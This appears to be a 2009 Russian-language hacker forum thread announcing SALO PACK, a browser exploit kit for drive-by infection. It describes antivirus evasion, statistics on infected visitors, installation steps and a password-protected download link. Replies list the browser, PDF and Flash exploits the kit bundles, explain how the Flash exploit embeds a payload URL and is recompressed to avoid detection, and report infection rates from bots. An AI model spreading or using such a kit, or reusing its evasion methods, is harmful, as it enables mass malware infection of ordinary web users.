[SALO PACK] Alpha version

не актуально

SALO PACK © UASC
by n0153r, Dimi4​

• Данный програмный продукт предназначен только для образовательных целей. Использование его в любом другом
  виде может быть расценено как нарушение закона!
• Запрещена продажа и использование исходного кода SALO PACK в коммерческих целях

Круто, да?

Мультисистемная связка эксплойтов со статистикой. (Написана с нуля)

• Крипт кода эксплойтов по технологии разработанной UASC. (n0153r)
• Использование технологии Sajax
• Детальная статистика по странам, пробиву, браузерам, операционным системам.
• Подсчет пробива без необходимости использования ПО заходящего на URL статистики.
• Абсолютно ничего не палится АВ

На этот момент SALO PACK представляет собой набор из 6-х эксплойтов

Пример статистики:

Или:
Кол-во посетителей 175
Кол-во зараженных 49
Общая пробиваемость 28%
ІЕ зараженных 97.96%
Установка

• Отредактируйте файл cfg.php в соответствии с вашими данными.
• В файле cfg.php строчку:
  
  Code:

  $config_adminPass=md5("xek"); 

  Замените на
  
  Code:

  $config_adminPass=ВАШ_ПАРОЛЬ_В_МД5
  

• Загрузите все файлы из архива на сервер.
• Установите права 777 на файл cfg.php.
• Запустите скрипт sql.php.
• Зайдите в админ-центр (/admin/), перейдите в меню "Настройки", и загрузите свой файл.

Скриншуты

Вход в админку:


Пробитые ИП:


Настройки:


Скачать: (Пароль - _roa_salopack)
http://uasc.org.ua/files/SALO_PACK_v_1.1.rar
P.S. Если у кого есть желание поделится сплойтами, и поддержать проект - велкам ПМ. Особенно нужен флеш сплойт.

2009 © UASC​

 

хек. держи +
а так, неплохо было бы в описание добавить что за эксплоиты используются

 

Адепт .. а почему со сплойта идёт редирект на http://[xxx]/t/gate.php

 

Это для теста погрузилось тебе ПО. Ничего опасного нет, отстук просто на гейт.
Можете реверсить, проверять и тд.

 

8 ишак пробивает?

 

Сплоит под флеш - уже устарел (а более новых версия в руки не попадало както)

 

отпиши плиз какие сплойты юзаются

П.С. НАЗВАНИЕ ТРУ)))

 

PHP:

  mysql_query("drop database $config_dbName;");
  mysql_query("create database $config_dbName;");


вотэто лучше убрать... или хотябы предуприждение написать

А как определяеься заражон комп или нет?
заходил через ие7 в стате пишеться что заражен, хотя на самом деле файл небыл запущен

 

Code:

GET /SALO_PACK/i.php HTTP/1.1
Host: localhost

Code:

<br />
<b>Notice</b>:  Undefined index:  HTTP_USER_AGENT in <b>pew\pew\pew\SALO_PACK\f.php</b> on line <b>6</b><br />
<br />

f.php:

Code:

$nua = strToLower([color=red][b]@[/b][/color]$_SERVER['HTTP_USER_AGENT']);

и везде подобавлять error_reporting(0);

 

Народ, сегодня уезжаю, поэтому может не успею ответить на все вопросы.

2 nc.STRIEM Поправим.

Определение пробива происходит следующим образом: код сплойта исполняется, в конце отправляется результат с помощью Sajax

Все указанные погрешности постараюсь исправить как только будет возможность

 

На счет списка сплойтов:
Дело в том, что связка начала писатся около полгода назад, и названия сплойтов надо просто вспоминать, ведь щас они криптованые.
Под Оперу:
IE7 Sploit (DirectShow)
Opera 9.62 [exploit] - https://forum.antichat.ru/printthread.php?t=57602&pp=40 полностю переделаный от n0153r
Осел
1 - http://unitedcrew.org/viewtopic.php?p=55556
2 - http://eriz.pcinside.pl/weblog/gadu-padu-trojanik-64.html
3 - https://forum.antichat.ru/printthread.php?t=43038&pp=40

также прошу не забывать от том что совместным автором является n0153r

 

Вот Flash сплоит. Вроде как под 12 версий флеша.
Когда то писал для своей связки.
Алгоритм работы такой:
Грузится файл flash.dat - неупакованная флешка - сигнатура FWS
Затем в неё вбивается адрес для скачевания файла.
И Потом пакуется всё это гзипом и добавляются заголовки для получения упакованной флешки (сигнатура CWS) - для беспаливности )

 

Спасибо =) Сейчас розберусь и добавлю все.
Жди в скором времени апдейт ...

 

вообщем тестил я связку на 2 ботах, в обоих случаях ничего не остучало, 1 бота слили 100 лоадов по стате в 40% пробива) второго 20 лоадов и ничего не отстукало)

 

у меня ни ИЕ7 ни Лису 2, ни оперу не пробило, хотя писало что пробив был.
Кстати ИЕ любезно предложил запустить сплойт, я эту инициативу одобрил, однако он в ответ завис, так и не запустив мою заветную программулину. =(

 

Ну наконец дошли руки обновить связку.
Посидели с Димкой и наколдовали обновления.
Добавили сплоит под ПДФ и под ФФ 3.5
Все что собрали до отпуска
Может у кого нить есть что-то интересное - предлагайте.

А вот и линк : http://uasc.org.ua/files/SALO_PACK_v_1.1.rar

Жду критику
P/S думаю до версии 2.0 все будет работать как часики .
Делали с душой для все РОА.
Спасибо за внимание.

 

404 по линку

 

http://uasc.org.ua/files/SALO_PACK_v_1.1.rar

 

Аналогинчно как и у sboy20042 и Twoster система отписала 100 загрузок, а в реале ничего не прогрузилось